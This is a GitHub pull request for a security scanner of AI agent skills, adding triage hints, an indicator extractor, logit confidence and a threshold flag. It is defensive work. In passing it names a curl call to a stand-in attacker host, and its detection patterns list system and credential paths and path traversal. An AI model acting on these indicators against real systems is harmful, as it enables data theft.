feat(scan): defense-in-depth triage hints (Item E) by kurtpayne · Pull Request #211 · kurtpayne/skillscan-security

kurtpayne · 2026-04-26T23:05:37Z

Summary

Item E of the post-v4.7 pivot. The scanner has 4 detection layers (static rules, IOC matching, ML, optional behavioral trace). Today they fire independently. This PR adds cross-layer triage hints — advisory recommendations surfaced in `ScanReport.triage_hints` after all layers have run.

Hints don't change the verdict or score. They tell the user why the verdict came out as it did and what action could improve confidence.

Hint types

ID	Trigger	Recommendation
H001 ESCALATE_TO_TRACE	PINJ-ML-001 fires with `logit_confidence < 0.7` AND no static-rule corroboration on the same file	Run `skillscan-trace` for behavioral verification
H002 INTEL_GAP	Finding has indicators (URL/domain/IP) not present in the IOC database	Run `skillscan intel refresh` or manually verify
H003 STRONG_CORROBORATION	ML + static rule both fire on the same file	Informational — verdict is well-corroborated
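The per-file logic behind H001 and H003 in the table above can be sketched as follows. This is a minimal illustration, not the PR's `compute_triage_hints`. The `Finding`/`Hint` dataclasses, the `layer` field used to tell static findings apart, and the function name `ml_static_hints` are all hypothetical.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

ML_RULE = "PINJ-ML-001"
ESCALATE_BELOW = 0.7  # H001 trigger threshold from the table


@dataclass
class Finding:
    # Hypothetical stand-in for skillscan's Finding; `layer` is an assumed field.
    rule_id: str
    file: str
    layer: str  # "static", "ioc", or "ml"
    logit_confidence: Optional[float] = None


@dataclass
class Hint:
    id: str
    file: str
    detail: str


def ml_static_hints(findings: list[Finding]) -> list[Hint]:
    """Per-file H001/H003 rules (illustrative only)."""
    by_file: dict[str, list[Finding]] = defaultdict(list)
    for f in findings:
        by_file[f.file].append(f)

    hints: list[Hint] = []
    for path, group in by_file.items():
        # Only real ML detections count; advisory IDs such as
        # PINJ-ML-NO-MODEL share the "ml" layer but are ignored here.
        ml = [f for f in group if f.rule_id == ML_RULE]
        static = [f for f in group if f.layer == "static"]
        if not ml:
            continue
        if static:
            hints.append(Hint("H003", path, "ML and static rules agree"))
        elif any(
            f.logit_confidence is not None and f.logit_confidence < ESCALATE_BELOW
            for f in ml
        ):
            hints.append(Hint("H001", path, "low-confidence ML finding; run skillscan-trace"))
    return hints


findings = [
    Finding("PINJ-ML-001", "a/SKILL.md", "ml", 0.62),
    Finding("PINJ-ML-001", "b/SKILL.md", "ml", 0.99),
    Finding("STATIC-EXAMPLE-001", "b/SKILL.md", "static"),
    Finding("PINJ-ML-NO-MODEL", "c/SKILL.md", "ml"),
]
print([(h.id, h.file) for h in ml_static_hints(findings)])
# [('H001', 'a/SKILL.md'), ('H003', 'b/SKILL.md')]
```

Grouping by file first keeps the rules isolated per file. A static hit on one file never suppresses an H001 on another.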

Stack note

This PR depends on #205 (logit_confidence) and #208 (indicators). Both base commits are cherry-picked into this branch so the diff is self-contained. Once #205 and #208 land in main, this PR rebases cleanly (cherry-picks become no-ops).

Implementation

`Indicator` and `TriageHint` models, plus the `Finding.indicators` and `Finding.logit_confidence` fields, in `models.py` (strictly additive: `ScanReport.triage_hints` defaults to `[]`).
`skillscan.triage_hints.compute_triage_hints(findings, iocs)` — pure function, easily unit-testable.
Wired into `analysis_pkg/_scanner.py` after findings are collected. Wrapped in `try/except` — a hint bug never breaks the scanner.
IOC value normalisation strips `http(s)://` scheme so URL indicators match domain-shaped IOCs.
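The list above has two integration points: an additive `triage_hints` field that defaults to an empty list, and a hint pass that can never break the scan. Here is a minimal sketch of both. It uses plain dataclasses instead of the project's pydantic models, and `attach_hints` and the `TriageHint` field names are hypothetical.

```python
from __future__ import annotations

import logging
from dataclasses import dataclass, field
from typing import Callable, Sequence

log = logging.getLogger("triage_sketch")


@dataclass
class TriageHint:
    # Field names are illustrative; the PR's pydantic model may differ.
    id: str
    title: str
    detail: str


@dataclass
class ScanReport:
    findings: list = field(default_factory=list)
    # Strictly additive: existing consumers just see an empty list.
    triage_hints: list[TriageHint] = field(default_factory=list)


def attach_hints(
    report: ScanReport,
    compute: Callable[[Sequence, Sequence], list[TriageHint]],
    iocs: Sequence,
) -> ScanReport:
    """Run the hint pass after all layers; a failure here never fails the scan."""
    try:
        report.triage_hints = compute(report.findings, iocs)
    except Exception:  # deliberately broad: hints are advisory only
        log.exception("triage hint computation failed; continuing without hints")
        report.triage_hints = []
    return report


def broken(findings, iocs):
    raise RuntimeError("bug in hint logic")


report = attach_hints(ScanReport(findings=["finding-1"]), broken, iocs=[])
print(report.triage_hints)  # [] (findings are left untouched)
```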

Test plan

`SKILLSCAN_NO_USER_RULES=1 pytest tests/test_triage_hints.py -v` — 18/18 passing
Full suite (excluding 7 stale-rule tests already fixed by #204, "test: align test_rules.py with rules-snapshot at 2026.04.25 (unblocks main)"): 765 passed, 8 skipped
`ruff format` + `ruff check` — clean on all touched files
Manual smoke against the bundled v4 GGUF on a held-out skill: confirm the H001/H002/H003 trio surfaces correctly when `--ml-detect` runs

Future work (not in this PR)

SARIF integration: emit hints as additional rule properties
Text/CLI summary: add a "Recommendations" section after the findings table
Skillscan-trace integration: when H001 emits, the trace tool could deep-link back to the originating ML finding

🤖 Generated with Claude Code



codecov · 2026-04-26T23:26:06Z

Codecov Report

❌ Patch coverage is 90.44586% with 30 lines in your changes missing coverage. Please review.
✅ Project coverage is 76.61%. Comparing base (f72c00e) to head (ef01c17).
⚠️ Report is 2 commits behind head on main.

Files with missing lines	Patch %	Lines
src/skillscan/ml_detector.py	75.80%	15 Missing ⚠️
src/skillscan/indicators.py	94.67%	9 Missing ⚠️
src/skillscan/analysis_pkg/_scanner.py	44.44%	5 Missing ⚠️
src/skillscan/triage_hints.py	98.33%	1 Missing ⚠️

Additional details and impacted files

```diff
@@            Coverage Diff             @@
##             main     #211      +/-   ##
==========================================
+ Coverage   75.87%   76.61%   +0.73%     
==========================================
  Files          41       43       +2     
  Lines        5994     6307     +313     
==========================================
+ Hits         4548     4832     +284     
- Misses       1446     1475      +29
```


Item C of the post-v4.7 pivot. Replaces "look at line 12" with "look at the curl to evil.example.com on line 12" by post-processing the model's output (no retraining required).

Adds:
- skillscan.models.Indicator: pydantic model with type/value/line/evidence
- skillscan.models.Finding.indicators: new optional list field (default [], backward-compatible with all existing consumers)
- skillscan.indicators: extractor module with regex-based extractors for 6 indicator types:
  - url: http(s) URLs (terminator-aware: shell substitution $(...) and backticks don't get absorbed)
  - cve: CVE-YYYY-NNNN[NNN], also extracted from `reasoning` text (the model often cites CVEs not in the skill body)
  - ip: IPv4 dotted-quad with octet validation; localhost noise floor (127.x, 0.0.0.0)
  - domain: bare hostnames not already surfaced by the URL extractor; a lookbehind blocks parent-domain dupes (`nist.gov` inside `nvd.nist.gov`); 30-entry common-domain noise floor (github, npm, pypi, anthropic, ...)
  - package: npm scoped (@scope/name) anywhere; pip/npm/yarn/pnpm install command-line capture (multi-package)
  - file_path: /etc, /var, /tmp, /usr, /root system paths; ../../ traversal; ~/.dotfiles; Windows C:\
- 25 unit tests covering each extractor, plus a realistic-skill integration test
- Wiring in ml_detector.py: extract_indicators() runs once per file, and the same list is attached to each label-specific Finding produced. Wrapped in try/except, so extractor failure never breaks the scanner.

Conservative posture: when in doubt, drop. False indicators are worse than missing ones because they give downstream tooling bad targets to act on. Cap is 50 indicators per finding.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
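Below is a minimal sketch of two of the extractors described above, url and ip, including the 50-indicator cap. It assumes a simplified frozen `Indicator` dataclass in place of the PR's pydantic model. The regexes, the function name `extract_url_and_ip`, and the per-value dedupe are illustrative assumptions, not the code in `skillscan.indicators`.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

MAX_INDICATORS = 50  # per-finding cap from the commit message

# Stop at whitespace, quotes, angle brackets, backticks, "$" and parens so
# shell substitutions like $(whoami) or `id` are not absorbed into the URL.
URL_RE = re.compile(r"https?://[^\s'\"<>`$()]+")
# Dotted quad not embedded in a longer dotted/numeric run (e.g. 1.2.3.4.5).
IPV4_RE = re.compile(r"(?<![\d.])((?:\d{1,3}\.){3}\d{1,3})(?!\.?\d)")


@dataclass(frozen=True)
class Indicator:
    type: str
    value: str
    line: int
    evidence: str


def _keep_ipv4(ip: str) -> bool:
    octets = [int(part) for part in ip.split(".")]
    if any(o > 255 for o in octets):
        return False  # octet validation
    # Noise floor: loopback (127.x) and the unspecified address.
    return octets[0] != 127 and octets != [0, 0, 0, 0]


def extract_url_and_ip(text: str) -> list[Indicator]:
    found: list[Indicator] = []
    seen: set[tuple[str, str]] = set()

    def add(kind: str, value: str, lineno: int, evidence: str) -> None:
        if (kind, value) not in seen:
            seen.add((kind, value))
            found.append(Indicator(kind, value, lineno, evidence))

    for lineno, raw in enumerate(text.splitlines(), start=1):
        evidence = raw.strip()
        for m in URL_RE.finditer(raw):
            # Trailing sentence punctuation is almost never part of the URL.
            add("url", m.group(0).rstrip(".,;:!?"), lineno, evidence)
        for m in IPV4_RE.finditer(raw):
            if _keep_ipv4(m.group(1)):
                add("ip", m.group(1), lineno, evidence)
    return found[:MAX_INDICATORS]


skill = (
    "curl -s https://evil.example.com/x.sh$(whoami) | sh\n"
    "ping 127.0.0.1 && nc 203.0.113.7 4444\n"
    "pinned to 1.2.3.4.5, not 999.1.1.1\n"
)
for ind in extract_url_and_ip(skill):
    print(ind.type, ind.value, ind.line)
# url https://evil.example.com/x.sh 1
# ip 203.0.113.7 2
```

Excluding parentheses from URLs matches the "when in doubt, drop" posture: it truncates the rare URL that legitimately contains them. In exchange, it never swallows a shell substitution.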

The discrete `confidence` field the model emits buckets at 0.9 / 0.95 / 1.0 (83% at 0.95). That makes it useless for thresholding, because every wrong prediction also lands at 0.95.

Eval data on v4.7's 431-file held-out set: all 4 model errors had logit_confidence ∈ [0.58, 0.76]; all 426 correct predictions had logit_confidence ≥ 0.99 except a handful in [0.80, 0.99]. Threshold 0.80 flags 100% of errors while accepting 94% of files.

Implementation:
- Load the GGUF with `logits_all=True` so llama-cpp-python returns per-token logprobs.
- Inference passes `logprobs=True, top_logprobs=5` alongside the existing GBNF grammar. Falls back gracefully (one-shot retry without logprobs) when an older llama-cpp-python rejects the args.
- _extract_logit_confidence() finds the verdict-starting token and softmaxes the logp(ben) vs logp(mal) entries to produce a continuous P(predicted_verdict) ∈ [0, 1]. Handles the missing-from-top-K case with a soft floor.
- Surfaced as Finding.logit_confidence (Optional[float]). Older clients without logprobs payloads get None, so the change is fully backward-compatible.

Severity mapping is unchanged in this commit; logit_confidence is an additional signal that downstream tooling can threshold against. A future PR can fold it into severity demotion (e.g., MED → LOW when logit < 0.7).

Eval evidence: skillscan-corpus/eval_results/v47_logit_confidence_eval.json

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
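The two-way softmax described above can be sketched as follows. It assumes the top-K logprobs at the verdict position are already available as a plain `{token: logprob}` dict; how llama-cpp-python shapes that payload is not shown here. Several details are assumptions, not necessarily what `_extract_logit_confidence()` does: the function names, the `ben`/`mal` prefix matching, and using the smallest top-K logprob as the soft floor for a missing verdict token.

```python
from __future__ import annotations

import math
from typing import Mapping, Optional


def _lookup(top: Mapping[str, float], prefix: str) -> Optional[float]:
    # Assumption: verdict tokens look like "ben"/"mal", possibly with
    # surrounding spaces or quotes; take the best-scoring match.
    matches = [lp for tok, lp in top.items() if tok.strip(' "').lower().startswith(prefix)]
    return max(matches) if matches else None


def logit_confidence(top: Mapping[str, float], predicted: str) -> Optional[float]:
    """P(predicted verdict) from a two-way softmax over the ben/mal logprobs."""
    if not top:
        return None  # no logprobs payload (older client): stay backward-compatible
    pred_key, other_key = ("mal", "ben") if predicted.lower().startswith("mal") else ("ben", "mal")
    # Soft floor: a token outside the top-K scores at most the K-th logprob.
    floor = min(top.values())
    lp_pred = _lookup(top, pred_key)
    lp_other = _lookup(top, other_key)
    lp_pred = floor if lp_pred is None else lp_pred
    lp_other = floor if lp_other is None else lp_other
    # Numerically stable exp(a) / (exp(a) + exp(b)).
    m = max(lp_pred, lp_other)
    a, b = math.exp(lp_pred - m), math.exp(lp_other - m)
    return a / (a + b)


top = {"mal": math.log(0.6), "ben": math.log(0.2), "the": math.log(0.1)}
print(round(logit_confidence(top, "malicious"), 3))  # 0.75
print(round(logit_confidence(top, "benign"), 3))  # 0.25
```

Renormalising over only the two verdict tokens discards probability mass spent on other tokens. The result therefore reads as "how decisively the model picked this verdict over the other one".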

Closes Item B's user-facing promise: "Enables --threshold 0.85 for CI gates". The earlier commit added Finding.logit_confidence; this commit makes it actually usable from the command line.

Adds --ml-threshold (also SKILLSCAN_ML_THRESHOLD env var, default 0.0). When > 0, drops PINJ-ML-001 findings whose logit_confidence is below the threshold. Advisory findings (PINJ-ML-NO-MODEL/STALE/LARGE-FILE/UNAVAIL) are never filtered. Findings without logit_confidence (older clients) are also never filtered, which keeps the change backward-safe.

Recommended thresholds (per the 431-file v4.7 held-out eval):
- --ml-threshold 0.99: keeps 60%, all correct (strictest CI gate)
- --ml-threshold 0.90: keeps 87%, all correct
- --ml-threshold 0.80: keeps 94%, all correct, drops every model error
- --ml-threshold 0.70: keeps 97%, 99.5% correct (lenient)

Plumbed through scanner.scan() at three CLI callsites plus the underlying _scanner.scan(). With the default (no flag), behaviour is unchanged for existing users.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
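A minimal sketch of the filtering rule described above. `apply_ml_threshold`, `resolve_threshold`, and the slimmed-down `Finding` are hypothetical. The precedence, where an explicit flag overrides `SKILLSCAN_ML_THRESHOLD`, is also an assumption; the commit message does not state it.

```python
from __future__ import annotations

import os
from dataclasses import dataclass
from typing import Iterable, Optional

ML_RULE = "PINJ-ML-001"


@dataclass
class Finding:
    rule_id: str
    logit_confidence: Optional[float] = None


def resolve_threshold(cli_value: Optional[float]) -> float:
    # Assumption: an explicit flag wins over the env var; 0.0 means "off".
    if cli_value is not None:
        return cli_value
    return float(os.environ.get("SKILLSCAN_ML_THRESHOLD", "0.0"))


def apply_ml_threshold(findings: Iterable[Finding], threshold: float) -> list[Finding]:
    if threshold <= 0:
        return list(findings)  # default: no behaviour change
    kept = []
    for f in findings:
        if f.rule_id != ML_RULE or f.logit_confidence is None:
            kept.append(f)  # advisories and logprob-less findings are never filtered
        elif f.logit_confidence >= threshold:
            kept.append(f)
    return kept


findings = [
    Finding("PINJ-ML-001", 0.62),
    Finding("PINJ-ML-001", 0.995),
    Finding("PINJ-ML-NO-MODEL"),
    Finding("PINJ-ML-001", None),
]
kept = apply_ml_threshold(findings, resolve_threshold(0.80))
print([(f.rule_id, f.logit_confidence) for f in kept])
# [('PINJ-ML-001', 0.995), ('PINJ-ML-NO-MODEL', None), ('PINJ-ML-001', None)]
```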

Cross-layer recommendations surfaced in ScanReport.triage_hints. Hints are advisory: they do NOT change the verdict or score. They run after all detection layers (static rules, IOC, ML, optional trace) have fired and emerge from the combined signal.

Hint types:
- H001 ESCALATE_TO_TRACE: ML detection with logit_confidence < 0.7 AND no static-rule corroboration on the same file. Recommend skillscan-trace for behavioral verification.
- H002 INTEL_GAP: indicators (URL/domain/IP) extracted from a finding aren't present in the IOC DB. Recommend `skillscan intel refresh` or manual verification.
- H003 STRONG_CORROBORATION: ML + static rule both flagged the same file. Informational hint surfacing the multi-layer agreement.

Builds on Item B's logit_confidence (uncertainty signal) and Item C's indicators (cross-reference target).

Integration:
- models.py: TriageHint model + ScanReport.triage_hints field (default [], strictly additive)
- triage_hints.py: pure-function compute_triage_hints(findings, iocs)
- analysis_pkg/_scanner.py: invoked after findings are collected, wrapped in try/except so a hint bug never breaks the scanner
- 18 unit tests covering each hint, per-file isolation, advisory suppression, IOC URL normalisation, and edge cases

Future work (not in this PR): SARIF properties, text-output rendering of hints in the CLI summary section.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
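The H002 cross-reference, including the scheme-stripping normalisation, could look roughly like this. Beyond stripping `http(s)://`, a few steps are assumptions: lower-casing, trimming a trailing slash, and falling back to the URL's host part, so that a URL with a path still matches a domain-shaped IOC. `normalise_ioc`, `intel_gaps`, and the two-field `Indicator` are hypothetical names.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

_SCHEME_RE = re.compile(r"^https?://", re.IGNORECASE)
NETWORK_TYPES = {"url", "domain", "ip"}  # indicator types H002 looks at


@dataclass
class Indicator:
    type: str
    value: str


def normalise_ioc(value: str) -> str:
    """Lower-case, strip an http(s):// scheme, and trim a trailing slash."""
    return _SCHEME_RE.sub("", value.strip().lower()).rstrip("/")


def intel_gaps(indicators: Iterable[Indicator], iocs: Iterable[str]) -> list[str]:
    """Network indicator values with no IOC match (H002 candidates)."""
    known = {normalise_ioc(v) for v in iocs}
    gaps: list[str] = []
    for ind in indicators:
        if ind.type not in NETWORK_TYPES:
            continue  # e.g. CVEs and file paths are not IOC lookups
        norm = normalise_ioc(ind.value)
        host = norm.split("/", 1)[0]  # assumed fallback: match on the host part
        if norm not in known and host not in known and ind.value not in gaps:
            gaps.append(ind.value)
    return gaps


iocs = ["https://evil.example.com", "198.51.100.9"]
found = [
    Indicator("url", "https://evil.example.com/payload.sh"),
    Indicator("url", "https://novel-bad.io/x"),
    Indicator("ip", "198.51.100.9"),
    Indicator("cve", "CVE-2024-0001"),
]
print(intel_gaps(found, iocs))  # ['https://novel-bad.io/x']
```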

github-advanced-security AI found potential problems Apr 26, 2026


Comment thread tests/test_triage_hints.py

```python
hints = compute_triage_hints([f], iocs)
h002 = [h for h in hints if h.id == "H002"]
assert len(h002) == 1
assert "novel-bad.io" in h002[0].detail
```

kurtpayne and others added 4 commits April 26, 2026 17:09

kurtpayne force-pushed the feat/ml-defense-output branch from 63a111b to ef01c17 April 27, 2026 00:09


kurtpayne wants to merge 4 commits into main from feat/ml-defense-output
